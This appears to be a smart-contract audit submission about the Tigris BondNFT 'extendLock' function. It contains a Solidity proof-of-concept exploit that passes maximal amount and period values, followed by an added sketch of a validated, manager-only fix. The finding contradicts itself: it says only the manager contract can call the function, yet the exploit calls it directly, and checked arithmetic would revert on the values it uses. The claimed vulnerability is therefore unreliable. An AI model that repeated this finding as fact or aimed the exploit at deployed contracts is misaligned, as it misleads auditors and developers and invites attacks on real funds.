One potential exploit against this code targets the "extendLock" function. This function allows the manager contract to extend the lock period and/or amount of a bond, and it does not include any checks to ensure that the new lock period and/or amount are valid. This means that an attacker could potentially call this function with maliciously large values for the "period" and "amount" parameters, which could lead to the bond being locked for an arbitrarily large amount of time and/or an arbitrarily large amount of tigAsset being locked.
Proof of Concept
function exploit() public {
    // Replace "bondNFT" with the address of the BondNFT contract
    BondNFT bondNFT = BondNFT(address(0x12345678));
    // Replace "id" with the ID of the bond to be exploited
    uint id = 1;
    // Replace "asset" with the address of the tigAsset token being locked
    address asset = address(0x98765432);
    // Replace "manager" with the address of the manager contract
    address manager = address(0xabcdef01);
    // Replace "sender" with the address of the account calling the exploit
    address sender = msg.sender;
    // Set "amount" and "period" to arbitrarily large values
    // (type(uint).max is the largest uint256; uint(-1) is rejected by Solidity 0.8+)
    uint amount = type(uint).max;
    uint period = type(uint).max;
    // Call the "extendLock" function with the maliciously large values
    bondNFT.extendLock(id, asset, amount, period, sender);
}
This exploit could potentially result in the bond being locked for an indefinitely long period of time, effectively rendering the tigAsset locked and unavailable to the owner of the bond. This could have significant consequences, depending on the value and importance of the tigAsset being locked.
Lines of code
https://github.com/code-423n4/2022-12-tigris/blob/588c84b7bb354d20cbca6034544c4faa46e6a80e/contracts/BondNFT.sol#L1-L383
Tools Used
Slither, chat.openai.com, Remix IDE
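For reference, the kind of validation the report says is missing from "extendLock" can be sketched as follows. This is an added example, not code from the report or from the Tigris repository: the contract name, the Bond struct layout, the MAX_PERIOD value and the revert strings are assumptions, and the "sender" parameter is omitted for brevity.

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.0;

// Added illustration: a simplified bond store, NOT the Tigris BondNFT contract.
// Struct layout, MAX_PERIOD and revert strings are assumptions.
contract BoundedBondLock {
    struct Bond {
        address asset;   // token locked in the bond
        uint256 amount;  // amount locked
        uint256 period;  // lock length in days
        bool exists;
    }

    uint256 public constant MAX_PERIOD = 365; // assumed upper bound, in days
    address public immutable manager;
    mapping(uint256 => Bond) public bonds;

    constructor(address _manager) {
        manager = _manager;
    }

    // Only the manager contract may create or extend locks.
    modifier onlyManager() {
        require(msg.sender == manager, "!manager");
        _;
    }

    function createLock(uint256 id, address asset, uint256 amount, uint256 period) external onlyManager {
        require(!bonds[id].exists, "exists");
        require(amount > 0, "!amount");
        require(period > 0 && period <= MAX_PERIOD, "!period");
        bonds[id] = Bond(asset, amount, period, true);
    }

    function extendLock(uint256 id, address asset, uint256 amount, uint256 period) external onlyManager {
        Bond storage bond = bonds[id];
        require(bond.exists, "!bond");
        require(bond.asset == asset, "!asset");
        // Compare against the remaining headroom so the check itself cannot overflow.
        require(period <= MAX_PERIOD - bond.period, "MAX PERIOD");
        // Checked arithmetic (Solidity >= 0.8) reverts if the new total would wrap.
        bond.amount += amount;
        bond.period += period;
    }
}
```

With these checks, a call that passes the maximum uint256 for "period" reverts with "MAX PERIOD", a maximum "amount" reverts on the checked addition, and any caller other than the manager is rejected before either value is read.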